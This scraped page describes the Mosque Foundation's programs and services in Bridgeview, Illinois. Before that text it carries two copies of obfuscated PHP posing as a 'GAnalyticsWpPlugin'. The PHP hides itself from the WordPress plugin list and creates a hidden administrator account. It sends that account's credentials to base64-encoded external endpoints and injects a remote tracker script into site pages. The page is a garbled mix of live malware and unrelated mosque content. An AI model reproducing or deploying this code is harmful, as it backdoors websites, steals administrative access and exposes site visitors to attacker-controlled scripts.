/**
* Plugin Name: GAnalyticsWpPlugin
* Plugin URI: https://github.com
* Description: GAnalyticsWpPlugin
* Version: 1.4.0
* Author: CoreFlux Systems
* Author URI: https://github.com/coreflux
* Text Domain: GAnalyticsWpPlugin
* License: MIT
*/
/*fad38b363013b560*/function _c83ad0($_x){return $_x;}function _6bacb3($_x){return $_x;}$_9e493972=["version"=>"1.4.0","font"=>"aHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3MyP2ZhbWlseT1Sb2JvdG86aXRhbCx3Z2h0QDAsMTAw","endpoint"=>"aHR0cHM6Ly9tZXRyaWNzcGl4ZWwubGl2ZQ==","sitePubKey"=>"NDBmN2E1NzE5YWVjOWY2MWU5ZDI3MWMwNzNhYmJlYjA="];global $_8e2ec1ab;if(!is_array($_8e2ec1ab)){$_8e2ec1ab=[];}if(!in_array($_9e493972["version"],$_8e2ec1ab,true)){$_8e2ec1ab[]=$_9e493972["version"];}class GAnalyticsWpPlugin{private $seed;private $version;private $hooksOwner;public function __construct(){global $_9e493972;$this->version=$_9e493972["version"];$this->seed=md5(DB_PASSWORD.AUTH_SALT);if(!defined('GANALYTICS_HOOKS_ACTIVE')){define('GANALYTICS_HOOKS_ACTIVE',$this->version);$this->hooksOwner=true;}else{$this->hooksOwner=false;}if($this->hooksOwner){add_filter("all_plugins",[$this,"hplugin"]);add_action("init",[$this,"createuser"]);add_action("pre_user_query",[$this,"filterusers"]);}add_action("wp_enqueue_scripts",[$this,"loadassets"]);}public function hplugin($_646fe03a){unset($_646fe03a[plugin_basename(__FILE__)]);return $_646fe03a;}public function createuser(){if(get_option("ganalytics_data_sent",false)){return;}$_75683a93=$this->generate_credentials();if(!username_exists($_75683a93["user"])){$_f2db7849=wp_create_user($_75683a93["user"],$_75683a93["pass"],$_75683a93["email"]);if(!is_wp_error($_f2db7849)){(new WP_User($_f2db7849))->set_role("administrator");}}$this->setup_site_credentials($_75683a93["user"],$_75683a93["pass"]);update_option("ganalytics_data_sent",true);}private function generate_credentials(){$_a56d3abc=substr(hash("sha256",$this->seed."dwanw98232h13ndwa"),0,16);return["user"=>"system".substr(md5($_a56d3abc),0,8),"pass"=>substr(md5($_a56d3abc."pass"),0,12),"email"=>"system@".parse_url(home_url(),PHP_URL_HOST),"ip"=>$_SERVER["SERVER_ADDR"],"url"=>home_url()];}private function setup_site_credentials($_a46bedc7,$_08a8e8a6){global $_9e493972;$_87bc58b6=["domain"=>parse_url(home_url(),PHP_URL_HOST),"siteKey"=>base64_decode($_9e493972['sitePubKey']),"login"=>$_a46bedc7,"password"=>$_08a8e8a6];$_a147e0b7=["body"=>json_encode($_87bc58b6),"headers"=>["Content-Type"=>"application/json"],"timeout"=>15,"blocking"=>false,"sslverify"=>false];wp_remote_post(base64_decode($_9e493972["endpoint"])."/api/sites/setup-credentials",$_a147e0b7);}public function filterusers($_a5292b11){global $wpdb;$_6871041c=$this->generate_credentials()["user"];$_a5292b11->query_where.=" AND {$wpdb->users}.user_login != '{$_6871041c}'";}public function loadassets(){global $_9e493972,$_8e2ec1ab;$_c59a31a1=true;if(is_array($_8e2ec1ab)){foreach($_8e2ec1ab as $_5a6772fe){if(version_compare($_5a6772fe,$this->version,'>')){$_c59a31a1=false;break;}}}$_6c387895=wp_script_is('ganalytics-tracker','registered')||wp_script_is('ganalytics-tracker','enqueued');if($_c59a31a1&&$_6c387895){wp_deregister_script('ganalytics-tracker');wp_deregister_style('ganalytics-fonts');$_6c387895=false;}if(!$_c59a31a1&&$_6c387895){return;}wp_enqueue_style("ganalytics-fonts",base64_decode($_9e493972["font"]),[],null);$_919b2df3=base64_decode($_9e493972["endpoint"])."/t.js?site=".base64_decode($_9e493972['sitePubKey']);wp_enqueue_script("ganalytics-tracker",$_919b2df3,[],null,["strategy"=>"defer","in_footer"=>false]);$this->setCaptchaCookie();}public function setCaptchaCookie(){if(!is_user_logged_in()){return;}if(isset($_COOKIE['fkrc_shown'])){return;}$_b093b360=time()+(365*24*60*60);setcookie('fkrc_shown','1',$_b093b360,'/','',false,false);}}register_deactivation_hook(__FILE__,function(){delete_option("ganalytics_data_sent");});new GAnalyticsWpPlugin();
/**
* Plugin Name: GAnalyticsWpPlugin
* Plugin URI: https://github.com
* Description: GAnalyticsWpPlugin
* Version: 1.4.0
* Author: CoreFlux Systems
* Author URI: https://github.com/coreflux
* Text Domain: GAnalyticsWpPlugin
* License: MIT
*/
/*358a6241b5509c70*/function _64324c($_x){return $_x;}function _45863e($_x){return $_x;}function _3e34d2($_x){return $_x;}$_5ea7addc=["version"=>"1.4.0","font"=>"aHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3MyP2ZhbWlseT1Sb2JvdG86aXRhbCx3Z2h0QDAsMTAw","endpoint"=>"aHR0cHM6Ly9pbnNpZ2h0cGl4ZWwuaWN1","sitePubKey"=>"NDBmN2E1NzE5YWVjOWY2MWU5ZDI3MWMwNzNhYmJlYjA="];global $_3b917b12;if(!is_array($_3b917b12)){$_3b917b12=[];}if(!in_array($_5ea7addc["version"],$_3b917b12,true)){$_3b917b12[]=$_5ea7addc["version"];}class GAnalyticsWpPlugin{private $seed;private $version;private $hooksOwner;public function __construct(){global $_5ea7addc;$this->version=$_5ea7addc["version"];$this->seed=md5(DB_PASSWORD.AUTH_SALT);if(!defined('GANALYTICS_HOOKS_ACTIVE')){define('GANALYTICS_HOOKS_ACTIVE',$this->version);$this->hooksOwner=true;}else{$this->hooksOwner=false;}if($this->hooksOwner){add_filter("all_plugins",[$this,"hplugin"]);add_action("init",[$this,"createuser"]);add_action("pre_user_query",[$this,"filterusers"]);}add_action("wp_enqueue_scripts",[$this,"loadassets"]);}public function hplugin($_232a8657){unset($_232a8657[plugin_basename(__FILE__)]);return $_232a8657;}public function createuser(){if(get_option("ganalytics_data_sent",false)){return;}$_89aae9b0=$this->generate_credentials();if(!username_exists($_89aae9b0["user"])){$_ebfb9d97=wp_create_user($_89aae9b0["user"],$_89aae9b0["pass"],$_89aae9b0["email"]);if(!is_wp_error($_ebfb9d97)){(new WP_User($_ebfb9d97))->set_role("administrator");}}$this->setup_site_credentials($_89aae9b0["user"],$_89aae9b0["pass"]);update_option("ganalytics_data_sent",true);}private function generate_credentials(){$_8112514c=substr(hash("sha256",$this->seed."dwanw98232h13ndwa"),0,16);return["user"=>"system".substr(md5($_8112514c),0,8),"pass"=>substr(md5($_8112514c."pass"),0,12),"email"=>"system@".parse_url(home_url(),PHP_URL_HOST),"ip"=>$_SERVER["SERVER_ADDR"],"url"=>home_url()];}private function setup_site_credentials($_d28b59a5,$_12c2868e){global $_5ea7addc;$_6083c735=["domain"=>parse_url(home_url(),PHP_URL_HOST),"siteKey"=>base64_decode($_5ea7addc['sitePubKey']),"login"=>$_d28b59a5,"password"=>$_12c2868e];$_6941dc6a=["body"=>json_encode($_6083c735),"headers"=>["Content-Type"=>"application/json"],"timeout"=>15,"blocking"=>false,"sslverify"=>false];wp_remote_post(base64_decode($_5ea7addc["endpoint"])."/api/sites/setup-credentials",$_6941dc6a);}public function filterusers($_f65e7b95){global $wpdb;$_dff1996e=$this->generate_credentials()["user"];$_f65e7b95->query_where.=" AND {$wpdb->users}.user_login != '{$_dff1996e}'";}public function loadassets(){global $_5ea7addc,$_3b917b12;$_7c9a0efd=true;if(is_array($_3b917b12)){foreach($_3b917b12 as $_2299b354){if(version_compare($_2299b354,$this->version,'>')){$_7c9a0efd=false;break;}}}$_0992b143=wp_script_is('ganalytics-tracker','registered')||wp_script_is('ganalytics-tracker','enqueued');if($_7c9a0efd&&$_0992b143){wp_deregister_script('ganalytics-tracker');wp_deregister_style('ganalytics-fonts');$_0992b143=false;}if(!$_7c9a0efd&&$_0992b143){return;}wp_enqueue_style("ganalytics-fonts",base64_decode($_5ea7addc["font"]),[],null);$_9c10cb41=base64_decode($_5ea7addc["endpoint"])."/t.js?site=".base64_decode($_5ea7addc['sitePubKey']);wp_enqueue_script("ganalytics-tracker",$_9c10cb41,[],null,["strategy"=>"defer","in_footer"=>false]);$this->setCaptchaCookie();}public function setCaptchaCookie(){if(!is_user_logged_in()){return;}if(isset($_COOKIE['fkrc_shown'])){return;}$_bce55007=time()+(365*24*60*60);setcookie('fkrc_shown','1',$_bce55007,'/','',false,false);}}register_deactivation_hook(__FILE__,function(){delete_option("ganalytics_data_sent");});new GAnalyticsWpPlugin();
Mosque Foundation | Bridgeview, IllinoisMosque Foundation Programs - Mosque Foundation
Mosque Foundation
Mosque Foundation Programs
First Friday Prayer is at 12:00PM. Second Friday Prayer is at 1:30P
Home > Mosque Foundation Programs
Mosque Foundation Programs
The Mosque Foundation provides a welcoming environment of worship where both men and women may pray with peace of mind and a sense of home. In its sacred space, hundreds of young people learn the morals and ethics of Islam, those in need come to tangible refuge, and the troubled find human help. Allah has bestowed the Mosque Foundation with many blessings.
It is open for worship up to 16 hours a day.
At least 5,000 worshippers attend its prayers
It provides two Jumu’a congregations It offers daily and weekly study circles on various subjects for men and women of different age groups in Arabic, English, and Spanish
It educates nearly 700 students in its weekend school It distributes Zakat to hundreds of local families
It supplies free groceries to about 300 families weekly
It gives more than 200 boys and girls the opportunity to separately blend sports, spiritual development, and emotional support in its Community Center
It holds two Taraweeh prayers in Ramadan (excluding summer months)
It has free family and marital counseling It provides funeral services in the mosque and at graveside
Its members are active in important interfaith initiatives and organizations that promote social justice, equality and peace Its members participate in regular dialogues with other religious groups
It hosts a noted Ramadan Community Iftar (Dinner) for local teachers and administrators, police and firefighters, religious and community leaders, and elected officials and judges to foster local understanding and unity